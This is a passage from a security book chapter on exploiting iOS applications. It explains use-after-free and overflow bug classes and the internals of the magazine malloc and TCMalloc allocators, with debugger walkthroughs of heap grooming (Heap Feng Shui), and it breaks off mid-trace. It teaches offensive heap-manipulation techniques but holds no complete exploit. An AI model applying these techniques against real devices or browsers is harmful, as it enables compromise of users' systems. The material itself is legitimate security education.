Chapter 7
Exploitation
The attack surface on iOS is similar to the one available on Mac OS X. Therefore, as far as userland exploitation is concerned, your focus should be tailored to client-side heap exploitation.
This chapter starts by covering the common bug classes present in most client-side applications, and then digs into the notions you need to write a successful attack against them.
In modern application exploitation, it is vital to fully understand how the allocator used by the application works and how to control it as precisely as possible. In this chapter you learn about the iOS system allocator and the techniques you can use to control its layout.
One of the most frequently hit targets is the web browser. MobileSafari uses TCMalloc instead of the system allocator, so this chapter also dissects how it works and how to leverage its internals to improve an exploit's reliability.
Finally, an example of a client-side exploit, Pwn2own 2010 MobileSafari, is analyzed to demonstrate how the techniques described in this chapter are applied in real life.
Depending on the targeted software, the types of vulnerabilities present in it vary wildly. For instance, when it comes to browsers it is very likely that the bug classes you will be dealing with are object lifetime issues, including use-after-free and double-free bugs, among others. If, instead, the target is a binary format parser (such as a PDF reader), the bug classes are most likely arithmetic issues or overflows.
This section briefly describes the strategies applied most frequently to exploit bugs belonging to the bug classes discussed earlier, so that you will be able to grasp which details of the allocator's behavior are relevant for each bug class.
Object lifetime issues, such as use-after-free and double-free bugs, are often present in software when an attacker has a lot of control (for example, through JavaScript) of the behavior of the application.
Use-after-free bugs usually exist when an object is deallocated but then used again in a code path. Such bugs tend to be present when the management of an object life span is far from obvious, which is one of the reasons why browsers are the perfect playground for them. Figure 7.1 shows the characteristics of these types of bugs.
In general, the strategy for exploiting these vulnerabilities is pretty straightforward:
Often the easiest way for an attacker to execute code is to replace the virtual table pointer of the object with an address under his control; this way, whenever an indirect call is made, the execution can be hijacked.
Double-frees are vulnerabilities that happen when an object is deallocated more than once during its life span. The exploitation of double-free can come in different shapes and flavors, but most of the time it can be considered a subcase of a use-after-free bug. The first strategy for turning a double-free into a use-after-free is the following:
The newly created object is freed again as part of the double-free vulnerability.
The second strategy is to inspect all the code paths taken when the vulnerable object is freed, and determine whether it is possible to hijack the execution by controlling its content with specifically crafted data. For instance, if an indirect call (either of the object itself or of a member of the object) is triggered in the object destructor, an attacker can take over the application in pretty much the same fashion used for use-after-free bugs.
It should be clear by now that you have a lot of allocation-deallocation gimmicks to learn in order to exploit these vulnerabilities. In fact, the focus with these kinds of vulnerabilities is more on the functioning of an allocator than possible weaknesses in handling memory blocks.
In the next section you see some bug classes that require more focus on the latter than the former.
Arithmetic and Overflow Vulnerabilities These vulnerabilities usually allow an attacker to overwrite four or more bytes at more or less arbitrary locations. Whether an integer overflow occurs and allows an attacker to write past the size of a buffer, or allows the attacker to allocate a smaller-than-needed buffer, or the attacker ends up having the chance to write to a buffer that is smaller than intended, what she needs is a reliable way to control the heap layout to be able to overwrite interesting data.
Especially in the past, the strategy was usually to overwrite heap metadata so that when an element of a linked list was unlinked, an attacker could overwrite an arbitrary memory location. Nowadays, it is more common to overwrite application-specific data, because the heap normally checks the consistency of its data structures. Overwriting application-specific data often requires making sure that the buffer you are overflowing sits close to the one that needs to be overwritten. Later in this chapter you learn to perform all those operations with some simple techniques that can work in most scenarios.
The iOS system allocator is called magazine malloc. To study the allocator implementation, refer to the Mac OS X allocator (whose implementation is located in magazine_malloc.c in the Libc source code for Mac OS X).
Although some research has been done on the previous version of the Mac OS X allocator, there is a general lack of information on magazine malloc exploitation. The best available research on the topic was covered by Dino Dai Zovi and Charlie Miller in The Mac Hackers Handbook (Wiley Publishing: 978-0-470-39536-3) and in a few other white papers.
This section covers the notions you need to create an exploit for the iOS allocator.
Magazine malloc uses the concept of regions to perform allocations. Specifically, the heap is divided into three regions:
Each region consists of an array of memory blocks (known as quanta) and metadata to determine which quanta are used and which ones are free. Each region differs slightly from the others based on two factors — region and quantum size:
The allocator maintains 32 freelists for tiny and small regions. The freelists from 1 to 31 are used for allocations, and the last freelist is used for blocks that are coalesced after two or more objects close to each other are freed.
The main difference between magazine malloc and the previous allocator on iOS is that magazine malloc maintains separate regions for each CPU present on the system. This allows the allocator to scale much better than the previous one. This chapter does not take this difference into account because only the new iPhone 4S and iPad 2 are dual-core; the other Apple products running iOS have only one CPU.
When an allocation is required, magazine malloc first decides which region is the appropriate one based on the requested size. The behavior for tiny and small regions is identical, whereas for large allocations the process is slightly different. This section walks through the process for tiny and large regions, which gives a complete overview of how the allocation process works.
Every time a memory block is deallocated, magazine malloc keeps a reference to it in a dedicated structure member called mag_last_free. If a new allocation has a requested size that is the same as the one in the mag_last_free memory block, this is returned to the caller and the pointer is set to NULL.
If the size differs, magazine malloc starts looking in the freelists for the specific region for an exact size match. If this attempt is unsuccessful, the last freelist is examined; this freelist, as mentioned before, is used to store larger memory blocks that were coalesced.
If the last freelist is not empty, a memory block from there is split into two parts: one to be returned to the caller and one to be put back on the freelist itself.
If all the preceding attempts failed and no suitable memory regions are allocated, magazine malloc allocates a new memory block using mmap() and assigns it to the appropriate region type. This process is carried out by the thread whose request for allocation could not be satisfied.
For large objects the process is more straightforward. Instead of maintaining 32 freelists, large objects have a cache that contains all the available entries. Therefore, the allocator first looks for already allocated memory pages of the correct size. If none can be found, it searches for bigger memory blocks and splits them so that one half can fulfill the request and the other is pushed back to the list of available ones.
Finally, if no memory regions are available, an allocation using mmap() is performed.
The same distinction made for allocations in terms of regions holds true for deallocations as well. As a result, deallocation is covered only for tiny memory objects and large memory objects.
When a tiny object is freed, the allocator puts it in the region cache, that is, mag_last_free.
The memory area that was previously there is moved to the appropriate free-list following three steps. First the allocator checks whether the object can be coalesced with the previous one, then it verifies if it can be coalesced with the following one. Depending on whether any of the coalescing operations were successful, the object is placed accordingly.
If the size of the object after coalescing it is bigger than the appropriate sizes for the tiny region, the object is placed in the last freelist (recalling from the Allocation section, this is the region where objects bigger than expected for a given region are placed).
When a tiny region contains only freed blocks, the whole region is released to the system.
The procedure is slightly different for large objects. If the object is larger than a certain threshold, the object is released immediately to the system. Otherwise, in a similar fashion to tiny and small, the object is placed in a dedicated position called large_entry_cache_newest.
The object that was in the most recent position is moved to the large object cache if there is enough space — that is, if the number of entries in the cache doesn't exceed the maximum number of elements allowed to be placed there. The size of the cache is architecture- and OS-dependent.
If the cache exceeds the size, the object is deallocated without being placed in the cache. Likewise, if after placing the object in the cache, the cache size grows too big, the oldest object in the cache is deleted.
In this section you walk through a number of examples that allow you to better understand the internals of the allocator and how to use it for your own purposes in the context of exploitation.
Most often you will work directly on the device. The main reason for this choice is that magazine malloc keeps per-CPU caches of tiny and small regions; therefore, the behavior on an Intel machine might be too imprecise compared to the iPhone. Nonetheless, when debugging real-world exploits it might be desirable to work from a virtual machine running Mac OS X, which is as close as possible to an iPhone in terms of available RAM and number of CPUs. Another viable and easier option is to use a jailbroken phone; this grants access to gdb and a number of other tools.
A number of tools exist to assist in debugging heap-related issues on Mac OS X; unfortunately, only a small percentage of those are available on non-jailbroken iPhones.
This section talks about all the available tools both on OS X and iOS, specifying which ones are available on both platforms and which are available only on OS X.
A number of environment variables exist to ease the task of debugging. The most important ones are listed here:
These environment variables can be used both on Mac OS X and iOS.
Another tool useful for determining the types of bugs you are dealing with is crashwrangler. When an application crashes, it tells the reason of the crash and whether or not it appears to be exploitable. In general, crashwrangler is not really good at predicting exploitability, but nonetheless understanding why the application crashed can be pretty useful.
Finally, you can use Dtrace to inspect allocations and deallocations of memory blocks on the system allocator. The Mac Hacker's Handbook shows a number of Dtrace scripts that can be handy for debugging purposes.
Both Dtrace and crashwrangler are available only for Mac OS X.
One of the easiest ways to exploit an arithmetic bug in the past was to overwrite heap-metadata information. This is not possible anymore with magazine malloc. Every time an object is deallocated, its integrity is verified by the following function:
static INLINE void * free_list_unchecksum_ptr(szone_t *szone, ptr_union *ptr) { ptr_union p; uintptr_t t = ptr->u; t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction p.u = t & ∼(uintptr_t)0xF; if ((t & (uintptr_t)0xF) != free_list_gen_checksum(p.u ˆ szone->cookie)) { free_list_checksum_botch(szone, (free_list_t *)ptr); return NULL; } return p.p; }
Specifically, when an object is deallocated, the previous and next elements of its heap metadata are verified by XORing them with a randomly generated cookie. The result of the XOR is placed in the high four bits of each pointer.
Metadata of objects allocated in the large region are not verified. Nonetheless the metadata for those objects are stored separately, and therefore classic attacks against large objects are not feasible either.
Unless an attacker is capable of reading the cookie that is used to verify heap metadata, the only option left is to overwrite application-specific data. For this reason you should try to become familiar with common operations that can be used during exploitation.
It is clear that the ability of an attacker to place memory objects close to each other in memory is pretty important to reliably overwrite application-specific data.
To understand better how to control the heap layout, start with a simple example that illustrates the way objects are allocated and freed. Run this small application on a test device running iOS:
#define DebugBreak() do { _asm_("mov r0, #20 mov ip, r0 svc 128 mov r1, #37 mov ip, r1 mov r1, #2 mov r2, #1 svc 128 " : : : "memory","ip","r0","r1","r2"); } while (0) int main(int argc, char *argv[]) { unsigned long *ptr1, *ptr2, *ptr3, *ptr4; ptr1 = malloc(24); ptr2 = malloc(24); ptr3 = malloc(24); ptr4 = malloc(24); memset(ptr1, 0xaa, 24); memset(ptr2, 0xbb, 24); memset(ptr3, 0xcc, 24); DebugBreak(); free(ptr1); DebugBreak(); free(ptr3); DebugBreak(); free(ptr2); DebugBreak(); free(ptr4); DebugBreak(); @autoreleasepool { return UIApplicationMain(argc, argv, nil, NSStringFromClass ([bookAppDelegate class])); } }
The application first allocates four buffers in the tiny region and then starts to free them one by one. We use a macro to cause a software breakpoint so that Xcode will automatically break into gdb for us while running the application on the test device.
At the first breakpoint the buffers have been allocated and placed in memory:
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin".tty /dev/ttys002 target remote-mobile /tmp/.XcodeGDBRemote-1923-40 Switching to remote-macosx protocol mem 0x1000 0x3fffffff cache mem 0x40000000 0xffffffff none mem 0x00000000 0x0fff none [Switching to process 7171 thread 0x1c03] [Switching to process 7171 thread 0x1c03] sharedlibrary apply-load-rules all Current language: auto; currently objective-c (gdb) x/40x ptr1 0x14fa50: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00000000 0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000 0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273 0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265 (gdb) c Continuing.
Next the first object is freed:
Program received signal SIGINT, Interrupt. main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/ booktest/main.m:34 34 free(ptr3); (gdb) x/40x ptr1 0x14fa50: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00000000 0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000 0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273 0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265 (gdb) c Continuing.
Nothing in memory layout has changed, and this is in line with what we have explained before. In fact, at this point only ptr1 was freed and it was placed accordingly in the mag_last_free cache. Going further:
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest /booktest/main.m:36 36 free(ptr2); (gdb) x/40x ptr1 0x14fa50: 0x90000000 0x90000000 0xaaaa0002 0xaaaaaaaa 0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000 0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 0x14fa90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00000000 0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273 0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265 (gdb) c Continuing.
Now ptr3 was freed as well; therefore, ptr1 had to be taken off the mag_last_free cache and was actually placed on the freelist. The first two dwords represent the previous and the next pointer in the freelist. Remembering that pointers are XORed with a randomly generated cookie, you can easily gather that both of them are NULL; in fact, the freelist was previously empty. The next object to be freed is ptr2:
Program received signal SIGINT, Interrupt. main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest /booktest/main.m:38 38 free(ptr4); (gdb) x/40x ptr1 0x14fa50: 0x70014fa9 0x90000000 0xaaaa0002 0xaaaaaaaa 0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000 0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 0x14fa90: 0x90000000 0x70014fa5 0xcccc0002 0xcccccccc 0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00020000 0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273 0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265 (gdb) c Continuing.
Things have changed slightly. Now ptr2 is in the mag_last_free cache and both ptr1 and ptr3 are on the freelist. Moreover, the previous pointer for ptr1 now points to ptr3, whereas the next pointer for ptr3 points to ptr1. Finally, see what happens when ptr4 is placed in the mag_last_free cache:
Program received signal SIGINT, Interrupt. 0x00002400 in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:39 39 DebugBreak(); (gdb) x/40x ptr1 0x14fa50: 0x90000000 0x90000000 0xaaaa0006 0xaaaaaaaa 0x14fa60: 0xaaaaaaaa 0xaaaaaaaa 0x00000000 0x00020000 0x14fa70: 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0xbbbbbbbb 0x14fa80: 0xbbbbbbbb 0xbbbbbbbb 0x00000000 0x00000000 0x14fa90: 0x90000000 0x90000000 0xcccc0002 0xcccccccc 0x14faa0: 0xcccccccc 0xcccccccc 0x00000000 0x00060000 0x14fab0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fac0: 0x00000000 0x00000000 0x00000000 0x00000000 0x14fad0: 0x7665442f 0x706f6c65 0x752f7265 0x6c2f7273 0x14fae0: 0x6c2f6269 0x63586269 0x4465646f 0x67756265 (gdb)
The content of ptr2 seems unchanged, but other things are different. First, both previous and next pointers for ptr1 and ptr3 are set to NULL, and also the size of the ptr1 block has changed. ptr1 in fact is now 96 bytes long (0x0006*16 bytes, which is the quanta size for the tiny block). This means that ptr1, ptr2, and ptr3 were all coalesced in one block that was placed on the freelist of a different quantum (0x0006), which has no other elements. Therefore, both the previous and the next pointers are freed. The freelist for 0x0002 is now empty.
The previous example cleared once and for all the idea of being able to overwrite heap metadata to achieve code execution. Therefore, the only available option is to allocate objects in a way that allows the vulnerable object to be placed next to one to overwrite. This technique is called Heap Feng Shui. Later in this chapter, you learn its basics and use it in the context of a browser. For now, you will limit yourself to a simple plan:
To accomplish this goal you can use the following simple application. It first allocates 50 objects and sets their content to 0xcc. Then half of them will be freed, and finally 10 objects filled with 0xaa will be allocated:
#define DebugBreak() do { _asm_("mov r0, #20 mov ip, r0 svc 128 mov r1, #37 mov ip, r1 mov r1, #2 mov r2, #1 svc 128 " : : : "memory","ip","r0","r1","r2"); } while (0) int main(int argc, char *argv[]) { unsigned long *buggy[50]; unsigned long *interesting[10]; int i; for(i = 0; i < 50; i++) { buggy[i] = malloc(48); memset(buggy[i], 0xcc, 48); } DebugBreak(); for(i = 49; i > 0; i -=2) free(buggy[i]); DebugBreak(); for(i = 0; i < 10; i++) { interesting[i] = malloc(48); memset(interesting[i], 0xaa, 48); } DebugBreak(); @autoreleasepool { return UIApplicationMain(argc, argv, nil, NSStringFromClass ([bookAppDelegate class])); } }
You start by running the application:
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin".tty /dev/ttys002 target remote-mobile /tmp/.XcodeGDBRemote-1923-73 Switching to remote-macosx protocol mem 0x1000 0x3fffffff cache mem 0x40000000 0xffffffff none mem 0x00000000 0x0fff none [Switching to process 7171 thread 0x1c03] [Switching to process 7171 thread 0x1c03] sharedlibrary apply-load-rules all Current language: auto; currently objective-c (gdb) x/50x buggy 0x2fdffacc: 0x0017ca50 0x0017ca80 0x0017cab0 0x0017cae0 0x2fdffadc: 0x0017cb10 0x0017cb40 0x0017cb70 0x0017cba0 0x2fdffaec: 0x0017cbd0 0x0017cc00 0x0017cc30 0x0017cc60 0x2fdffafc: 0x0017cc90 0x0017ccc0 0x0017ccf0 0x0017cd20 0x2fdffb0c: 0x0017cd50 0x0017cd80 0x0017cdb0 0x0017cde0 0x2fdffb1c: 0x0017ce10 0x0017ce40 0x0017ce70 0x0017cea0 0x2fdffb2c: 0x0017ced0 0x0017cf00 0x0017cf30 0x0017cf60 0x2fdffb3c: 0x0017cf90 0x0017cfc0 0x0017cff0 0x0017d020 0x2fdffb4c: 0x0017d050 0x0017d080 0x0017d0b0 0x0017d0e0 0x2fdffb5c: 0x0017d110 0x0017d140 0x0017d170 0x0017d1a0 0x2fdffb6c: 0x0017d1d0 0x0017d200 0x0017d230 0x0017d260 0x2fdffb7c: 0x0017d290 0x0017d2c0 0x0017d2f0 0x0017d320 0x2fdffb8c: 0x0017d350 0x0017d380 (gdb) x/15x 0x0017ca80 0x17ca80: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x17ca90: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x17caa0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x17cab0: 0xcccccccc 0xcccccccc 0xcccccccc (gdb) c Continuing.
All of the 50 objects were allocated, and each one of them is filled with 0xcc, as expected. Going on further you can see the status of the application after 25 objects are freed:
Program received signal SIGINT, Interrupt. 0x0000235a in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:34 34 DebugBreak(); (gdb) x/15x 0x0017cae0 0x17cae0: 0xa0000000 0xe0017cb4 0xcccc0003 0xcccccccc 0x17caf0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc 0x17cb00: 0xcccccccc 0xcccccccc 0xcccccccc 0x0003cccc 0x17cb10: 0xcccccccc 0xcccccccc 0xcccccccc (gdb) c Continuing.
The fourth object is one of those that were freed, specifically; it is the last one added to the freelist (in fact, the first object is stored in the mag_last_free cache instead). Its previous pointer is set to NULL and the next pointer is set to the sixth object in the buggy array. Finally, you allocate the objects you are interested in:
Program received signal SIGINT, Interrupt. 0x000023fe in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:41 41 DebugBreak(); (gdb) x/10x interesting 0x2fdffaa4: 0x0017ca80 0x0017cae0 0x0017cb40 0x0017cba0 0x2fdffab4: 0x0017cc00 0x0017cc60 0x0017ccc0 0x0017cd20 0x2fdffac4: 0x0017cd80 0x0017cde0 (gdb) x/15x 0x0017ca80 0x17ca80: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0x17ca90: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0x17caa0: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0x17cab0: 0xcccccccc 0xcccccccc 0xcccccccc
All the 10 replaced objects were previously freed and their content is filled with 0xaa as expected. In the output, you see the content of the first object of buggy, whose content you have seen before.
In a real-life application, the same technique can be applied, although some difficulties arise. Specifically, the heap state at the beginning of the exploit will be unknown and far from “ideal,” and the attacker might not have enough room to allocate as many objects as she wishes. Nonetheless, often this technique proves to be pretty useful and applicable. Later in this chapter when describing TCMalloc, you learn how to apply it to MobileSafari.
When dealing with object lifetime issues it is very important to be able to replace the vulnerable object in memory. This can become tricky when memory blocks are coalesced; in fact, in that case, the object size can change in more or less unpredictable ways. In general, you have three ways to overcome this problem:
With the first strategy the object will be fetched directly from the mag_last_free cache, and therefore no coalescence can take place. The second case makes sure that the next and the previous objects are not freed, again ensuring coalescence is not possible. The last case allows you to predict the size of the final object that will be coalesced, and thus be able to allocate a proper replacement object. To use the first or the second technique, you can use the examples previously shown in this chapter; you can try out the last technique with this simple application:
#define DebugBreak() do { _asm_("mov r0, #20 mov ip, r0 svc 128 mov r1, #37 mov ip, r1 mov r1, #2 mov r2, #1 svc 128 " : : : "memory","ip","r0","r1","r2"); } while (0) int main(int argc, char *argv[]) { unsigned long *ptr1, *ptr2, *ptr3, *ptr4; unsigned long *replacement; ptr1 = malloc(48); ptr2 = malloc(64); ptr3 = malloc(80); ptr4 = malloc(24); DebugBreak(); free(ptr1); free(ptr2); free(ptr3); free(ptr4); DebugBreak(); replacement = malloc(192); DebugBreak(); @autoreleasepool { return UIApplicationMain(argc, argv, nil, NSStringFromClass ([bookAppDelegate class])); } }
The application allocates four objects, each one of them a different size. The goal is to replace ptr2. To do this you take into account blocks coalescence, and therefore the replacement object will be 192 bytes instead of 64 bytes. Running the application verifies this:
GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin". tty /dev/ttys002 target remote-mobile /tmp/.XcodeGDBRemote-1923-41 Switching to remote-macosx protocol mem 0x1000 0x3fffffff cache mem 0x40000000 0xffffffff none mem 0x00000000 0x0fff none [Switching to process 7171 thread 0x1c03] [Switching to process 7171 thread 0x1c03] sharedlibrary apply-load-rules all Current language: auto; currently objective-c (gdb) x/x ptr1 0x170760: 0x00000000 (gdb) c Continuing.
ptr1 is allocated at 0x170760. Continuing the execution, you examine its content after all the pointers are freed:
Program received signal SIGINT, Interrupt. 0x0000240e in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:34 34 DebugBreak(); (gdb) x/4x ptr1 0x170760: 0x20000000 0x20000000 0x0000000c 0x00000000 (gdb) c Continuing.
ptr1 was assigned to quantum 0x000c, which corresponds to 192 bytes. It appears you are on the right track. Finally, the application allocates the replacement object:
Program received signal SIGINT, Interrupt. 0x00002432 in main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/booktest/main.m:38 38 DebugBreak(); (gdb) x/x replacement 0x170760: 0x20000000 (gdb)
The replacement object is correctly placed where ptr1 used to be in memory. ptr2 has been successfully replaced regardless of block coalescence.
The next section examines a different allocator used by a number of applications, including MobileSafari.
TCMalloc is an allocator originally conceived by Sanjay Ghemawat, and it is meant to be as fast as possible in multi-threaded applications. As a matter of fact, the whole structure of the allocator reduces thread interaction and locking to a bare minimum.
TCMalloc is of great interest for us because it is the allocator of choice for WebKit. In this section you delve into it to understand how it works and how you can leverage it to your needs as attackers.
TCMalloc has two different mechanisms for dealing with large and small allocations. The former are managed by the so-called Pageheap and are directly relayed to the underlying OS allocator, which was already discussed, whereas the latter are handled entirely by TCMalloc.
Whenever an allocation for an object that is bigger than a user-defined threshold, kMaxSize, is requested, the page-level allocator is used. The page-level allocator, Pageheap, allocates spans, that is, a set of contiguous pages of memory.
The procedure starts by looking in the double-linked list of spans already allocated to see whether any of the correct size are available to TCMalloc. In the double-linked list are two types of spans: ones that are available for use and ones that were deallocated by TCMalloc but have yet to be returned to the underlying system heap.
If a deallocated span is available, it is first reallocated and then returned. If, instead, the span is available and not marked deallocated, it is simply returned. If no spans of the correct size are available, the page-level allocator tries to locate a bigger span that is “good enough” for the role; that is, a span that is as close as possible to the requested size. Once it has found such a span, it splits the span so that the rest of the memory can be used later and returns a span of the correct size.
If no suitable spans are available, a new set of pages is requested to the underlying OS and split into two memory objects: one of the requested size and another one of the allocated size minus the amount of memory needed by the requested allocation.
When a span is not needed anymore, it is first coalesced with either the preceding span, the next span, or both, and then it is marked as free. Finally, the span is returned to the system by the garbage collector depending on a number of user-defined parameters, specifically, once the number of freed spans is greater than targetPageCount.
The mechanism used for allocating small objects is pretty convoluted. Each running thread has its own dedicated object cache and freelist. A freelist is a double-linked list that is divided into allocation classes. The class for objects that are smaller than 1024 bytes is computed as follows: (object_size + 7)/8.
For objects that are bigger than that, they are 128 bytes aligned and the class is computed this way: (object_size + 127 + (120<<7))/128.
In addition to the per-thread cache, a central cache exists. The central cache is shared by all threads and has the same structure of the thread cache.
When a new allocation is requested, the allocator first retrieves the thread cache for the current thread and looks into the thread freelist to verify whether any slots are available for the correct allocation class. If this fails, the allocator looks inside the central cache and retrieves an object from there. For performance purposes, if the thread cache is forced to ask the central cache for available objects instead of just transferring one object in the thread-cache, a whole range of objects is fetched.
In the scenario where both the thread cache and the central cache have no objects of the correct allocation class, those objects are fetched directly from the spans by following the procedure explained for large objects.
When a small object is deallocated, it is returned to the thread cache freelist. If the freelist exceeds a user-defined parameter, a garbage collection occurs.
The garbage collector then returns the unused objects from the thread cache freelist to the central cache freelist. Because all the objects in the central cache come from spans, whenever a new set of objects is reassigned to the central freelist, the allocator verifies whether the span the object belongs to is completely free or not. If it is, the span is marked as deallocated and will eventually be returned to the system, as explained before for large object allocation.
This section dissects TCMalloc techniques used to control the heap layout so that it becomes as predictable as possible. Specifically, it explains what steps are needed to exploit an object lifetime issue and talks about a technique called Heap Feng Shui. The technique was discussed publically for the first time by Alex Sotirov, and in that case it was tailored to IE specifically to exploit heap overflows in IE. Nonetheless, the same concepts can be applied to pretty much every heap implementation available on the market.
To obtain a predictable heap layout, the first thing you need to do is find an effective way to trigger the garbage collector. This is particularly important in the case of object lifetime issues because, most of the time, the objects aren't actually freed until a garbage collection occurs. The most obvious way of triggering the garbage collector is to use JavaScript. This, however, means that the techniques used are JavaScript-engine–dependent.
You can find the MobileSafari JavaScript engine, codenamed Nitro, in the JavascriptCore folder inside the WebKit distribution. Each object allocated through JavaScript is wrapped into a JSCell structure. The TCMalloc garbage collector is heavily influenced by the Nitro behavior. In fact, until JSCells are in use, those memory objects will not be freed.
To better understand this concept, take a look at the deallocation process of an HTML div object inside MobileSafari. You first allocate 10 HTML div objects, then you deallocate them and use a function (in this case Math.acos) to understand from the debugger when the deallocation is supposed to happen. Finally, you allocate a huge number of objects and see when the actual deallocation of the object happens:
Breakpoint 6, 0x9adbc1bb in WebCore::HTMLDivElement::create () (gdb) info reg eax 0x28f0c0 2683072 ecx 0x40 64 edx 0x40 64 ebx 0xc006ba88 -1073300856 esp 0xc006b2a0 0xc006b2a0 ebp 0xc006b2b8 0xc006b2b8 esi 0x9adbc1ae -1696874066 edi 0xc006ba28 -1073300952 eip 0x9adbc1bb 0x9adbc1bb <WebCore::HTMLDivElement::create(WebCore::QualifiedName const&, WebCore::Document*)+27> eflags 0x282 642 cs 0x1b 27 ss 0x23 35 ds 0x23 35 es 0x23 35 fs 0x0 0 gs 0xf 15 (gdb) awatch *(int *)0x28f0c0 Hardware access (read/write) watchpoint 8: *(int *) 2683072 (gdb) c Continuing. Hardware access (read/write) watchpoint 8: *(int *) 2683072
The div object is stored in EAX. You set a memory watchpoint on it to be able to track it during the execution.
Breakpoint 4, 0x971f9ee5 in JSC::mathProtoFuncACos () (gdb)
Now you have reached the point where the object is supposed to be deallocated, but the output shows that the object is still allocated as far as TCMalloc is concerned. Continuing further you get the following:
